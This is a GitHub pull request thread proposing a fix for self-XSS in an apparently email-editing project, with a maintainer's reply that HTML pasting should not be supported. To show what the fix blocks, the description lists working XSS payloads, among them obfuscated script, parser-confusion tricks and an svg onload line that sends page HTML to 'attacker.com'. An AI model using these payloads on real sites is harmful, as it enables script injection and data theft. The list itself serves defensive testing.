fix: Self-XSS

[wilau2]

Should help to fix:
#373
#340

Vuln:
GHSA-3256-58fp-785h

Use JSON5 instead of eval:
https://chatgpt.com/share/e/68f28e04-2608-8011-9e80-51728ff25bab

Sanitize the input:

When you copy-paste a Self-XSS attack like the following it will no longer execute:

<div id="d"><option
id="o"></div><script>d.addEventListener("DOMNodeRemoved",function(){new
ArrayBuffer(0xfffffff);alert()});document.createElement("select").options[0]=o;</script>
<noembed><img src="</noembed><iframe onload=alert(1)>" /></noembed>
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<html><head><meta http-equiv="x-ua-compatible" content="IE=5"></head><body><iframe
onload="JScript.Compact:alert(1)"></iframe><iframe
onload="JScript.Compact:alert(2);"></iframe></body></html>
<a href=# name=x id=x>Click me on IE11</a><script event="onclick(blah)<wtfbbq>{}"
for=x>blah.view.alert(1)</script>
<script event=onload for=window>return alert(2)};{ //IE11 only</script>
<svg/onload="(new
Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
javascript:"/*'/*`/*--><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
javascript://comment%0a%0dalert(0);
<script>([,하,,,,훌]=[]+{},[한,글,페,이,,로,드,
ㅋ
,,,ㅎ]=[!!하]+!하+하.
ㅁ)[훌+=하+ㅎ+ㅋ+한+글+
페+훌+한+하+글][훌](로+드+이+글+한+'(45)')()</script>
<d3"<"/onclick="1>[confirm``]"<">z
(_=>`${`${_}`[!![]<<!![]<<!![]]} ${`${_}`[~~![]]} ${`${_}`[~~!![]]}`)()

Before fix:

After fix:

[vercel]

@wilau2 is attempting to deploy a commit to the mryan's projects Team on Vercel.

A member of the Team first needs to authorize it.

[m-Ryan]

HTML pasting should not be supported because the HTML format cannot be guaranteed to conform to email formatting, which will cause many compatibility issues.